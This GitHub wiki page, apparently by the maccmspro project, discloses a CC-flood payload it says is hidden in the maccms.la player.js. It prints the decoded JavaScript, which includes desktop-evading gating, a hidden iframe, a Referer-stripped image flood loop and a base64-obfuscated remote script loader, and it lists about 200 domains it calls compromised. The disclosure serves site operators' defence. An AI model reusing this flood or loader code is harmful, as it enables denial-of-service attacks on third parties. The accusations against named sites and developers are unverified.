警告:严厉谴责CC攻击我们的.la版本假冒团队,整理了被控制的小部分肉鸡网站,有你的吗? - maccmspro/download GitHub Wiki
一天时间被请求了足足3.88B
每个小时被请求3亿次
大量请求重置了 referer，但依然有浏览器不支持这种调用方式，被我们从日志中抓了出来
涉及从maccms.la下载或者更新的所有版本
v10
2020.1000.1029+ 还有la版本最新的跨年度起飞版2022.1000.1099
v8
2020.1043+
通过抓包得出：原因是 maccms.la 最新版本加密的 player.js 在手机端访问时会远程调用攻击 js：
http://union.maccms.la/html/top10.js
http://union.maccms.la/html/top.js
大家不信可以自行解密
代码解密如下
(MacPlayer.Status) {
} else {
}
function msck(name, value) {
// Analyst note: writes cookie `name=value` (escape()-encoded) with path=/ and a
// 30-minute expiry (30 * 60 * 1000 ms from now). The only call in this payload
// is msck('k1', '1') from mshr(): the cookie is the "already armed" marker that
// mgck() / isNaN(ev) test, so a reload within 30 minutes does not re-arm the
// flood (an interval that is already running is unaffected by the cookie).
// Bracket-property access (date['setTime'] etc.) is obfuscation style, not a
// functional difference.
var date = new Date();
date['setTime']((date['getTime']() + (30 * 60) * (1000))),
document['cookie'] = (name + '=' + escape(value)) + (';path=/;expires=') + date['toGMTString']();
}
//这里开始写调用缓存时间 防止被发现目的为了隐藏攻击
function mgck(name) {
// Analyst note: reads cookie `name` out of document.cookie with a regex built
// from `name` (unescaped — harmless here because the only caller passes the
// literal 'k1') and returns its unescape()d value, or null when absent. The
// caller feeds the result to parseFloat, so "absent" surfaces as NaN.
// The backticks around the two lines below appear to be wiki-rendering
// artifacts rather than part of the script.
`var list, reg = new RegExp('(^|\x20)' + name + '=([^;]*)(;|$)');`
`if (list = document['cookie'].match(reg)) return unescape(list[2]); else return null;`
}
// Analyst note: shared state for the flood. `rr` is a cache-buster seeded from
// month+day+hour by string concatenation (e.g. the 21st of January at 11h gives
// "12111"); imgflood() later converts it to a number and increments it once per
// tick, and mshr() also appends it to the iframe URL. `ek`/`ev` are the 'k1'
// marker cookie name and its parsed value (NaN while the cookie is absent).
// `au` is the origin of the hidden iframe that mshr() injects on iOS.
var de = new Date(), mh = de['getMonth']() + 1,
da = de['getDate'](), hs = de['getHours'](), rr = mh + '' + da + '' + hs, ek = 'k1',
ev = parseFloat(mgck(ek)), ua = navigator['userAgent'],
au = '//a.laodaguan.cn/';
//这里判断移动端 过滤了windows和mac系统的抓包 所以必须通过移动端设备进行抓包才可以拿到加载内容 懂一点脚本的都能看懂
function mshr() {
// Analyst note — the arming gate. Operator precedence makes this
// `(A && B && C && D || E) && (F)`:
//   A: navigator.platform does not contain Win/Mac (desktop browsers skip it);
//   B: location.hostname does not contain localhost/127/192/10 (a substring
//      test, so it also skips any public hostname containing "10" or "127");
//   C: isNaN(ev) — the 'k1' marker cookie has not been set yet;
//   D: a `.MacPlayer` element exists (jQuery `$` is assumed to be loaded);
//   E: override — "mdg" anywhere in location.search forces it on.
// F is a comma expression: only the hidden, no-referrer, sandboxed iframe
// (`au` + "index.html?" + rr) is conditional on an iOS user agent; msck('k1','1')
// and setInterval(imgflood, 1500) run for every device that passes the gate,
// so Android visitors flood as well, just without the iframe.
// Defender's note: because A keys on platform, a desktop capture never shows
// these requests — which is why the page author captured on a phone. To check
// whether a site is affected without firing the flood, inspect the script the
// player page loads rather than triggering it; on the target side, look for
// the no-Referer image requests produced by imgflood() below.
`(!/(Win|Mac)/i.test(navigator['platform']) && !/(localhost|127|192|10)/i.test(location['hostname']) && isNaN(ev) && ($('.MacPlayer').length > 0) || (location['search'].indexOf('mdg') > -1)) && (/(iPhone|iPad|iPod|IOS)/i.test(ua) && $('body').append(`
`"<iframe style=\"display:none;\" referrerPolicy=\"no-referrer\" security=\"restricted\" sandbox=\"allow-same-origin allow-forms allow-scripts\" src=\"" + au + "index.html?" + rr + "\"></iframe>"`
`), msck(ek, '1'), setInterval(imgflood, 1500));`
}
//这是很常见的js 攻击手法 虽然做了referer重置但依然有浏览器不支持这种调用方式被我们抓出了日志
function imgflood() {
// Analyst note — one flood tick, scheduled every 1500 ms by mshr(). Each tick
// creates three Image objects whose src forces an uncacheable GET: one to
// www.maccms.com with the current timestamp, two to union.maccms.com/html/top10.js
// and /html/top.js with the incrementing counter `rr`. referrerPolicy=no-referrer
// strips the Referer so the target's logs do not reveal the originating site
// (the page author notes some browsers ignore it, which is how the source
// sites were identified). `rr` is the script-global seeded above; parseFloat
// turns the "MDDHH" string into a number on the first tick.
// Detection on the target side: bursts of Referer-less GETs for these two paths
// whose numeric query string increases by one per request from the same
// client, about two requests per second per visitor, mostly mobile user agents.
`rr = parseFloat(rr) + 1;`
`var img1 = new Image();`
`img1['setAttribute']('referrerPolicy', 'no-referrer');`
`img1['src'] = '//www.maccms.com/?' + new Date().getTime();`
`var img2 = new Image();`
`img2['setAttribute']('referrerPolicy', 'no-referrer');`
`img2['src'] = '//union.maccms.com/html/top10.js?' + rr;`
`var img3 = new Image();`
`img3['setAttribute']('referrerPolicy', 'no-referrer');`
`img3['src'] = '//union.maccms.com/html/top.js?' + rr;`
}
// Entry point of the payload: arms mshr() 50 ms after this script executes,
// i.e. right after the player page has had a chance to create `.MacPlayer`.
setTimeout(mshr, 50);
function abc() {
// Empty stub; nothing in the decoded payload calls it. Presumably kept so a
// page that references abc() does not throw — TODO confirm against the
// template that embeds this script.
}
function pcy() {
// Empty stub; nothing in the decoded payload calls it. Presumably kept so a
// page that references pcy() does not throw — TODO confirm against the
// template that embeds this script.
}
如何抓包？iOS、安卓下载《HTTP Catcher》即可在线抓包，快去看看你的网站是否调用了 union.maccms.la。还有一个判断方式：手机浏览器其他页面都加载完成后，如果播放页面浏览器头部一直是加载中的进度条，那么就是在长连接请求攻击，不会中断，非常消耗手机 CPU。
la 的作者说它去掉了远程调用。如果抓包不顺利，可以看看解密后的 la 版本 player.js 代码逻辑，就知道为什么了：
// Global error sink. A window.onerror handler that returns true suppresses the
// browser's default reporting of uncaught errors, so nothing from this page —
// including a remotely injected script that fails — shows up in the console.
// Defender's note: remove this line while inspecting what the player page loads.
var killErrors = function (value) {
  return true;
};
window.onerror = null;
window.onerror = killErrors;
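// Byte-string <-> base64 and UTF-16 <-> UTF-8 helpers used by MacPlayer.
// These are encodings, not encryption: in this file base64decode() recovers the
// remote script URL in MacPlayer.Show and the playback URLs when
// player_aaaa.encrypt == '2'. Anyone with the page source can reverse them.
var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

// Reverse lookup for the 128 ASCII code points: index = char code, value = the
// 6-bit digit, or -1 for characters that are not base64 digits. Built from the
// alphabet above so the two tables cannot drift apart.
var base64DecodeChars = (function () {
  var table = [];
  for (var i = 0; i < 128; i++) {
    table.push(-1);
  }
  for (var j = 0; j < base64EncodeChars.length; j++) {
    table[base64EncodeChars.charCodeAt(j)] = j;
  }
  return table;
})();

/**
 * Base64-encodes a byte string (each char code is truncated to its low 8 bits,
 * so callers must pass utf16to8() output, not raw UTF-16).
 * @param {string} str - byte string
 * @returns {string} base64 text with '=' padding
 */
function base64encode(str) {
  var out = "";
  var len = str.length;
  var i = 0;
  var c1, c2, c3;
  while (i < len) {
    c1 = str.charCodeAt(i++) & 0xff;
    if (i === len) {
      // one trailing byte -> two digits + "=="
      out += base64EncodeChars.charAt(c1 >> 2);
      out += base64EncodeChars.charAt((c1 & 0x3) << 4);
      out += "==";
      break;
    }
    c2 = str.charCodeAt(i++) & 0xff;
    if (i === len) {
      // two trailing bytes -> three digits + "="
      out += base64EncodeChars.charAt(c1 >> 2);
      out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
      out += base64EncodeChars.charAt((c2 & 0xF) << 2);
      out += "=";
      break;
    }
    c3 = str.charCodeAt(i++) & 0xff;
    out += base64EncodeChars.charAt(c1 >> 2);
    out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
    out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
    out += base64EncodeChars.charAt(c3 & 0x3F);
  }
  return out;
}

/**
 * Decodes base64 text to a byte string. Characters that are not base64 digits
 * (whitespace, line breaks, and — fixed here — any code point >= 128, which
 * used to fall off the end of the lookup table and produce garbage output)
 * are skipped; decoding stops at the first '=' or at a dangling partial group.
 * @param {string} str - base64 text
 * @returns {string} byte string (one char per byte)
 */
function base64decode(str) {
  // Table lookup that treats out-of-range code points like any other non-digit.
  function digitValue(code) {
    var v = base64DecodeChars[code & 0xff];
    return v === undefined ? -1 : v;
  }
  var out = "";
  var len = str.length;
  var i = 0;
  var c1, c2, c3, c4;
  while (i < len) {
    do {
      c1 = digitValue(str.charCodeAt(i++));
    } while (i < len && c1 === -1);
    if (c1 === -1) break;
    do {
      c2 = digitValue(str.charCodeAt(i++));
    } while (i < len && c2 === -1);
    if (c2 === -1) break;
    out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
    do {
      c3 = str.charCodeAt(i++) & 0xff;
      if (c3 === 61) return out; // '=' padding ends the data
      c3 = digitValue(c3);
    } while (i < len && c3 === -1);
    if (c3 === -1) break;
    out += String.fromCharCode(((c2 & 0xF) << 4) | ((c3 & 0x3C) >> 2));
    do {
      c4 = str.charCodeAt(i++) & 0xff;
      if (c4 === 61) return out; // '=' padding ends the data
      c4 = digitValue(c4);
    } while (i < len && c4 === -1);
    if (c4 === -1) break;
    out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
  }
  return out;
}

/**
 * Encodes a JS string to a UTF-8 byte string, one UTF-16 code unit at a time.
 * Kept bit-for-bit compatible with the original: U+0000 is written as the
 * two-byte form C0 80, and each half of a surrogate pair is written as its own
 * three-byte sequence (so astral characters are not standard four-byte UTF-8).
 * utf8to16() below reverses exactly this encoding.
 * @param {string} str
 * @returns {string} byte string
 */
function utf16to8(str) {
  var out = "";
  var len = str.length;
  for (var i = 0; i < len; i++) {
    var c = str.charCodeAt(i);
    if (c >= 0x0001 && c <= 0x007F) {
      out += str.charAt(i);
    } else if (c > 0x07FF) {
      out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
      out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
      out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
    } else {
      out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
      out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
    }
  }
  return out;
}

/**
 * Decodes a UTF-8 byte string (as produced by utf16to8) back to a JS string.
 * Lead bytes select the sequence length by their high nibble; bytes with a
 * high nibble of 8-11 (stray continuation bytes) or 15 are silently dropped,
 * and a truncated sequence yields NaN-derived characters — unchanged from the
 * original, callers are expected to pass well-formed input.
 * @param {string} str - byte string
 * @returns {string}
 */
function utf8to16(str) {
  var out = "";
  var len = str.length;
  var i = 0;
  var c, char2, char3;
  while (i < len) {
    c = str.charCodeAt(i++);
    switch (c >> 4) {
      case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
        // 0xxxxxxx: single byte
        out += str.charAt(i - 1);
        break;
      case 12: case 13:
        // 110xxxxx 10xxxxxx
        char2 = str.charCodeAt(i++);
        out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
        break;
      case 14:
        // 1110xxxx 10xxxxxx 10xxxxxx
        char2 = str.charCodeAt(i++);
        char3 = str.charCodeAt(i++);
        out += String.fromCharCode(((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) | ((char3 & 0x3F) << 0));
        break;
    }
  }
  return out;
}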
// Player bootstrap object from the decrypted maccms.la player.js. Globals it
// relies on: jQuery ($), player_aaaa (per-page playback data), MacPlayerConfig
// (site-wide player settings), maccms.path, and base64decode() from above.
var MacPlayer = {
// Formats `t` (defaults to now) with a strftime-like pattern. Note that 'MM'/'M'
// substitute getMonth() without +1, so they yield 00-11, and 'yy' uses the
// deprecated getYear(). The only caller in this file is Show(), which uses the
// result as a cache-buster, so the off-by-one month is cosmetic there.
'GetDate': function (f, t) {
if (!t) {
t = new Date()
}
var a = ['日', '一', '二', '三', '四', '五', '六'];
f = f.replace(/yyyy|YYYY/, t.getFullYear());
f = f.replace(/yy|YY/, (t.getYear() % 100) > 9 ? (t.getYear() % 100).toString() : '0' + (t.getYear() % 100));
f = f.replace(/MM/, t.getMonth() > 9 ? t.getMonth().toString() : '0' + t.getMonth());
f = f.replace(/M/g, t.getMonth());
f = f.replace(/w|W/g, a[t.getDay()]);
f = f.replace(/dd|DD/, t.getDate() > 9 ? t.getDate().toString() : '0' + t.getDate());
f = f.replace(/d|D/g, t.getDate());
f = f.replace(/hh|HH/, t.getHours() > 9 ? t.getHours().toString() : '0' + t.getHours());
f = f.replace(/h|H/g, t.getHours());
f = f.replace(/mm/, t.getMinutes() > 9 ? t.getMinutes().toString() : '0' + t.getMinutes());
f = f.replace(/m/g, t.getMinutes());
f = f.replace(/ss|SS/, t.getSeconds() > 9 ? t.getSeconds().toString() : '0' + t.getSeconds());
f = f.replace(/s|S/g, t.getSeconds());
return f
// Fills the {sid}/{nid} placeholders in this.Link; each is replaced twice
// because String.replace with a string pattern only replaces the first match.
}, 'GetUrl': function (s, n) {
return this.Link.replace('{sid}', s).replace('{sid}', s).replace('{nid}', n).replace('{nid}', n)
// Navigates to the episode URL built by GetUrl().
}, 'Go': function (s, n) {
location.href = this.GetUrl(s, n)
// Loads the preload frame, schedules AdsEnd() after this.Second seconds and
// writes this.Html into #playleft.
}, 'Show': function () {
$('#buffer').attr('src', this.Prestrain);
setTimeout(function () {
MacPlayer.AdsEnd()
}, this.Second * 1000);
$("#playleft").get(0).innerHTML = this.Html + '';
// REMOTE LOAD HOOK — the subject of this page. On every platform whose
// navigator.platform is not Win/Mac (i.e. phones and tablets) an async <script>
// is inserted whose src is the base64-obfuscated literal below; it decodes to
// //union.maccms.la/html/top10.js, the URL quoted at the top of the page, with
// a yyyyMMdd query so it is refetched at most once a day. Nothing in this
// object references anything that script might define, so its only effect is
// to run third-party code on visitors' devices. Mitigation: delete this
// if-block (or point it at a local asset) and confirm in a mobile capture that
// top10.js / top.js are no longer requested.
if (!/(Win|Mac)/i.test(navigator.platform)) {
var a = document.createElement('script');
a.type = 'text/javascript';
a.async = true;
a.charset = 'utf-8';
a.src = base64decode('Ly91bmlvbi5tYWNjbXMubGEvaHRtbC90b3AxMC5qcw==') + '?r=' + this.GetDate('yyyyMMdd');
var b = document.getElementsByTagName('script')[0];
b.parentNode.insertBefore(a, b)
}
// Shows the buffer frame, pointing it at this.Buffer if it is not already.
}, 'AdsStart': function () {
if ($("#buffer").attr('src') != this.Buffer) {
$("#buffer").attr('src', this.Buffer)
}
$("#buffer").show()
// Hides the buffer frame again (called from Show() after this.Second seconds).
}, 'AdsEnd': function () {
$('#buffer').hide()
// Marks the player as not running and reveals the #install frame.
}, 'Install': function () {
this.Status = false;
$('#install').show()
// Writes the player container and then a <script> for this.PlayFrom via
// document.write. this.Width/this.Height and this.PlayFrom are interpolated
// unescaped; after Init() the size values are either '100%' or a
// MacPlayerConfig value containing "px"/"%", and PlayFrom comes from
// player_aaaa.from (or the literal 'parse'). NOTE(review): this is safe only
// if MacPlayerConfig and player_aaaa are built from admin-controlled data —
// confirm on the server side that neither is derived from request input.
// The <tr> opened in the table string is never closed; browsers appear to
// tolerate this, but it is worth fixing if the markup is edited.
}, 'Play': function () {
document.write('<style>.MacPlayer{background: #000000;font-size:14px;color:#F6F6F6;margin:0px;padding:0px;position:relative;overflow:hidden;width:' + this.Width + ';height:' + this.Height + ';min-height:100px;}.MacPlayer table{width:100%;height:100%;}.MacPlayer #playleft{position:inherit;!important;width:100%;height:100%;}</style><div class="MacPlayer">' + '<iframe id="buffer" src="" frameBorder="0" scrolling="no" width="100%" height="100%" style="position:absolute;z-index:99998;"></iframe><iframe id="install" src="" frameBorder="0" scrolling="no" width="100%" height="100%" style="position:absolute;z-index:99998;display:none;"></iframe>' + '<table border="0" cellpadding="0" cellspacing="0"><tr><td id="playleft" valign="top" style=""> </td></table></div>');
this.offsetHeight = $('.MacPlayer').get(0).offsetHeight;
this.offsetWidth = $('.MacPlayer').get(0).offsetWidth;
document.write('<scr' + 'ipt src="' + this.Path + this.PlayFrom + '.js"></scr' + 'ipt>')
// Empty in this build; selected by Init() when player_aaaa.flag == "down".
}, 'Down': function () {
// Copies player_aaaa and MacPlayerConfig into this.* and starts playback.
// encrypt == '1' / '2' only unescape / base64-decode the URLs — obfuscation,
// not encryption.
}, 'Init': function () {
this.Status = true;
this.Parse = '';
var a = player_aaaa;
if (a.encrypt == '1') {
a.url = unescape(a.url);
a.url_next = unescape(a.url_next)
} else if (a.encrypt == '2') {
a.url = unescape(base64decode(a.url));
a.url_next = unescape(base64decode(a.url_next))
}
this.Agent = navigator.userAgent.toLowerCase();
this.Width = MacPlayerConfig.width;
this.Height = MacPlayerConfig.height;
// (page author) A mobile-device check was added here, so you must visit from
// a phone for it to load — which is why capturing on a PC finds nothing.
// Analyst note: this branch only selects widthmob/heightmob; the platform test
// that actually gates the remote script is the Win/Mac check in Show() above.
`if (this.Agent.indexOf("android") > 0 || this.Agent.indexOf("mobile") > 0 || this.Agent.indexOf("ipod") > 0 || this.Agent.indexOf("ios") > 0 || this.Agent.indexOf("iphone") > 0 || this.Agent.indexOf("ipad") > 0) {`
`this.Width = MacPlayerConfig.widthmob;`
`this.Height = MacPlayerConfig.heightmob`
`}`
// Size values without "px" or "%" fall back to 100%; values that contain
// either substring are passed through to Play() unchanged.
`if (this.Width.indexOf("px") == -1 && this.Width.indexOf("%") == -1) {`
`this.Width = '100%'`
`}`
`if (this.Height.indexOf("px") == -1 && this.Height.indexOf("%") == -1) {`
`this.Height = '100%'`
`}`
`this.Prestrain = MacPlayerConfig.prestrain;`
`this.Buffer = MacPlayerConfig.buffer;`
`this.Second = MacPlayerConfig.second;`
`this.Flag = a.flag;`
`this.Trysee = a.trysee;`
`this.Points = a.points;`
`this.Link = decodeURIComponent(a.link);`
`this.PlayFrom = a.from;`
`this.PlayNote = a.note;`
`this.PlayServer = a.server == 'no' ? '' : a.server;`
`this.PlayUrl = a.url;`
`this.PlayUrlNext = a.url_next;`
`this.PlayLinkNext = a.link_next;`
`this.PlayLinkPre = a.link_pre;`
`this.Id = a.id;`
`this.Sid = a.sid;`
`this.Nid = a.nid;`
`if (MacPlayerConfig.server_list[this.PlayServer] != undefined) {`
`this.PlayServer = MacPlayerConfig.server_list[this.PlayServer].des`
`}`
// Players flagged ps == "1" are routed through the parse URL instead of their
// own script: PlayFrom becomes 'parse' and this.Parse holds the parser URL.
`if (MacPlayerConfig.player_list[this.PlayFrom] != undefined) {`
`if (MacPlayerConfig.player_list[this.PlayFrom].ps == "1") {`
`this.Parse = MacPlayerConfig.player_list[this.PlayFrom].parse == '' ? MacPlayerConfig.parse : MacPlayerConfig.player_list[this.PlayFrom].parse;`
`this.PlayFrom = 'parse'`
`}`
`}`
`this.Path = maccms.path + '/static/player/';`
`if (this.Flag == "down") {`
`MacPlayer.Down()`
`} else {`
`MacPlayer.Play()`
`}`
`}`
};
MacPlayer.Init();
看了下，大部分都是海螺模板的站，应该是作者被 la 给忽悠了。虽然开发能力很强，但这智商也是堪忧，这么容易就被忽悠了去升级，结果沦为肉鸡。
唯一 GitHub 官方只有：https://github.com/maccmspro，域名：https://maccms.pro。官方下载渠道已经给出完整解密版的 player.js，里面加了判断 la 版本的不兼容，还有播放器透明预加载请求编码，未加密可自行修改。由于 la 版本存在自动更新后门，或许很多站长都不知道是怎么回事，那么请尽快下载更新包手动覆盖！
被控制为攻击肉鸡的域名列表如下:
http://1.mqdy.de
http://154.197.154.48
http://154.197.154.55
http://154.93.60.36
http://172.121.59.45
http://183.ydt.5ahome.cn
http://23.90.22.248
http://25u51.cnzu95.com:6033
http://7862y.com
http://87.sbs.5ahome.cn
http://9ov71.51add.com:4206
http://awyy18.com
http://bwl87.com
http://dianyings.cn
http://dy.tv56.cn
http://g5451.com
http://haowywz.com
http://hxc27.com
http://hxc97.com
http://i7801.com
http://itaojuba.com
http://lsqnjoa.cn
http://lyl23.me
http://m.163fahao.com
http://mideaysj.com
http://nq698.com
http://v.shensgo.com
http://vcfuli.com
http://wuritv6.com
http://www.234qvod.com
http://www.2kys.com
http://www.399q.cn
http://www.91m.cc
http://www.auedu.org
http://www.bajies.com
http://www.btdyba.com
http://www.cangpinhui.com.cn
http://www.cechi5.com
http://www.chinayd.org
http://www.chok8.com
http://www.dixi123.com
http://www.dy1958.com
http://www.dydzkjs.com
http://www.fusht.com
http://www.hanju233.com
http://www.hantutv.com
http://www.haohao44.com
http://www.hotwoods.biz
http://www.hwfudao.com
http://www.hxc45.com
http://www.i63.com.cn
http://www.ikrtv.com
http://www.itihi.com
http://www.jinhongjx.com
http://www.jlqsnwl.com
http://www.madou.la
http://www.meiyangle888.com
http://www.mimi91.xyz
http://www.mycctv.cn
http://www.ncdydyy.com
http://www.ok009.xyz
http://www.oukepuhui.com
http://www.pubger.com
http://www.qdkyjh.com
http://www.qpg6.com
http://www.rwgaoxin.com
http://www.rz31.com
http://www.tzwenyi.cn
http://www.vipys5.com
http://www.wearry.com
http://www.wuritv6.com
http://www.xiuhuan.xyz
http://www.xttzb.com
http://www.zaoyi.net
http://www.zhoumengping.xyz
http://xiaomc.info
http://xincheng888.net
https://001d.com
https://123kubo.net
https://123kubo.tv
https://173cq.com
https://5ji.tv
https://789dydy.com
https://789dyy.com
https://789yyw.com
https://ak222.cc
https://aqpos.top
https://awyy23.com
https://bwl87.com
https://ddvod.tv
https://duonaoyingyuan.tangrenjie.tv
https://dy0026.com
https://hhty029.com
https://hnxmz.com
https://holdoo.cn
https://hyrzs.com
https://i58b.tv
https://imaple.co
https://inzdrama.com
https://jumi.tv
https://longvcd.com
https://m.hjtv4.com
https://m.keso.org
https://m.klksm.com
https://m.my2058.com
https://m.sx0371.com
https://m.tv4.cc
https://m.xindiediao.com
https://momovod.tv
https://movie.58yanhao.com
https://o8tv.com
https://ouleyingyuan.tangrenjie.tv
https://sexx3.xyz
https://shichojp.com
https://shrocc.com
https://sy0752.com
https://tianchatv.com
https://tv.ci
https://vip.19zh.com
https://www.002tv.com
https://www.173cq.com
https://www.17kty.com
https://www.263163.cn
https://www.3ayy.com
https://www.3kt.net
https://www.52kandy.com
https://www.555dy1.com
https://www.5thnyh.com
https://www.789dydy.com
https://www.789dyw.net
https://www.789dywz.com
https://www.7caa.com
https://www.8090.me
https://www.91m.cc
https://www.99meiju.tv
https://www.ahrmgg.com
https://www.autonicdq.com
https://www.bddysf.com
https://www.biqune.com
https://www.calmlab.com
https://www.cclsu.com
https://www.chok8.com
https://www.cunzhangba.com
https://www.dadatu2.com
https://www.dadatutv.net
https://www.dadatuzi.com
https://www.dusheyy.com
https://www.f8yy.com
https://www.haiyouims.com
https://www.hanjutvwz.com
https://www.hbxhda.com
https://www.hjtv4.com
https://www.holdoo.cn
https://www.jianzhenkeji.com
https://www.jpysvip.net
https://www.kanxi5.com
https://www.ku2000.com
https://www.limintv.com
https://www.masansan.com
https://www.meijui.com
https://www.mindanggui.com
https://www.mldyy.cc
https://www.mshuifu.com
https://www.muyy.cc
https://www.newqiyu.com
https://www.o8tv.com
https://www.pianba.net
https://www.ppqun.com
https://www.puhua.cc
https://www.qcjycg.com
https://www.raoguns.com
https://www.schtbz.com
https://www.tancao.cn
https://www.tangrenjie.tv
https://www.tianlang88.com
https://www.tianmohk.com
https://www.ttspt.com
https://www.u5dy.com
https://www.wo03.com
https://www.wojiangwang.com
https://www.wuguiyy.com
https://www.wuweidy5.com
https://www.xiafandy.com
https://www.xianzonglin.club
https://www.xuejiancn.com
https://www.xxzz2.xyz
https://www.yhdmk.com
https://www.ys11.xyz
https://www.ysdzfwb.com
https://www.zgwangzhan.com
https://www.zhengqidiaosu.com
https://www.zhuijuju.com
https://xuejiancn.com
https://xzdjc.com
https://zgwangzhan.com